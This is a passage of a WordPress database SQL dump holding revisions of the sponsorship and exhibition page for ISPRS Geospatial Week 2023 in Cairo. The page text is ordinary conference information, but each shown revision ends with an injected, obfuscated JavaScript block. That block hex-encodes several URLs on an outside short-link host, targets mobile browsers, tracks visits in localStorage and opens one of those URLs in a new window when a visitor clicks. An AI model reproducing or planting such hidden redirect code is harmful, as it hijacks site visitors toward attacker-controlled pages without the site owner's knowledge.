_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-03-23 03:41:15','2023-03-23 03:41:15','',2920,'https://gsw2023.com/?p=3935',0,'revision','',0),
(3936,1,'2023-03-23 03:42:11','2023-03-23 03:42:11','','man','','inherit','open','closed','','man-2','','','2023-03-23 03:42:11','2023-03-23 03:42:11','',2920,'https://gsw2023.com/wp-content/uploads/2023/03/man-1.png',0,'attachment','image/png',0),
(3937,1,'2023-03-23 03:42:44','2023-03-23 03:42:44','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">ISPRS GEOSPATIAL WEEK 2023</span></h1>\n<h2 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">SPONSORSHIP AND EXHIBITION ,</span><span style=\"font-size: 18pt;\">Cairo – Egypt 2-7 September 2023</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 10pt;\">The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</span></p>\n<p><span style=\"font-size: 10pt;\">The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series of dedicated workshops. More information regarding ISPRS can be found at: http://www.isprs.org/.</span></p>\n<p><span style=\"font-size: 10pt;\">An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</span></p>\n<p><span style=\"font-size: 10pt;\">A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> for more details on the sponsorship opportunities for the GSW/2023.</span></p>\n<p><span style=\"font-size: 10pt;\">We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 Organizing Committee.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3933\" img_size=\"1800x2200\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">(<a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined</a>)</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3936\" img_size=\"2000x2000\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><span style=\"font-size: 10pt;\">Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</span></p>\n<ul>\n<li><span style=\"font-size: 10pt;\">May 1, 2023 Deadline for sponsorship confirmation and payment</span></li>\n<li><span style=\"font-size: 10pt;\">June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</span></li>\n</ul>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span><span style=\"font-size: 10pt;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Heliopolis Campus</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Re: ISPRS GSW’2023</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>ATT: Prof. Alla Abdelbary</strong></span></p>\n<p><span style=\"font-size: 10pt;\">P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685616 - 22685615 </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685892</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">CONFERENCE PROGRAM FOR EXHIBITORS</span></h1>\n<p>&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 2</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\"><strong>9:00 – 5:00</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\"><strong>Tutorial Day</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Exhibition Setup</strong></span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 3</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">12:00-17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition Opening</span></p>\n<p><span style=\"font-size: 10pt;\">Welcome Reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 4</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Exhibitors’ reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 5</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 15:00</span></p>\n<p><span style=\"font-size: 10pt;\">15:00 – 18:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Dismantle Exhibition</span></td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 10pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">INFORMATION</span></h1>\n<p><span style=\"font-size: 10pt;\">For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact the organizing committee by mail (<a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> ).</span>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-03-23 03:42:44','2023-03-23 03:42:44','',2920,'https://gsw2023.com/?p=3937',0,'revision','',0),
(3938,1,'2023-03-23 03:43:42','2023-03-23 03:43:42','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">ISPRS GEOSPATIAL WEEK 2023</span></h1>\n<h2 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">SPONSORSHIP AND EXHIBITION ,</span><span style=\"font-size: 18pt;\">Cairo – Egypt 2-7 September 2023</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 10pt;\">The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</span></p>\n<p><span style=\"font-size: 10pt;\">The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series of dedicated workshops. More information regarding ISPRS can be found at: http://www.isprs.org/.</span></p>\n<p><span style=\"font-size: 10pt;\">An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</span></p>\n<p><span style=\"font-size: 10pt;\">A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> for more details on the sponsorship opportunities for the GSW/2023.</span></p>\n<p><span style=\"font-size: 10pt;\">We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 Organizing Committee.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3933\" img_size=\"1800x2200\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">(<a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined</a>)</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3936\" img_size=\"1000x1000\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><span style=\"font-size: 10pt;\">Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</span></p>\n<ul>\n<li><span style=\"font-size: 10pt;\">May 1, 2023 Deadline for sponsorship confirmation and payment</span></li>\n<li><span style=\"font-size: 10pt;\">June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</span></li>\n</ul>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span><span style=\"font-size: 10pt;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Heliopolis Campus</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Re: ISPRS GSW’2023</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>ATT: Prof. Alla Abdelbary</strong></span></p>\n<p><span style=\"font-size: 10pt;\">P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685616 - 22685615 </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685892</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">CONFERENCE PROGRAM FOR EXHIBITORS</span></h1>\n<p>&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 2</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\"><strong>9:00 – 5:00</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\"><strong>Tutorial Day</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Exhibition Setup</strong></span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 3</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">12:00-17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition Opening</span></p>\n<p><span style=\"font-size: 10pt;\">Welcome Reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 4</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Exhibitors’ reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 5</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 15:00</span></p>\n<p><span style=\"font-size: 10pt;\">15:00 – 18:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Dismantle Exhibition</span></td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 10pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">INFORMATION</span></h1>\n<p><span style=\"font-size: 10pt;\">For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact the organizing committee by mail (<a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or <a 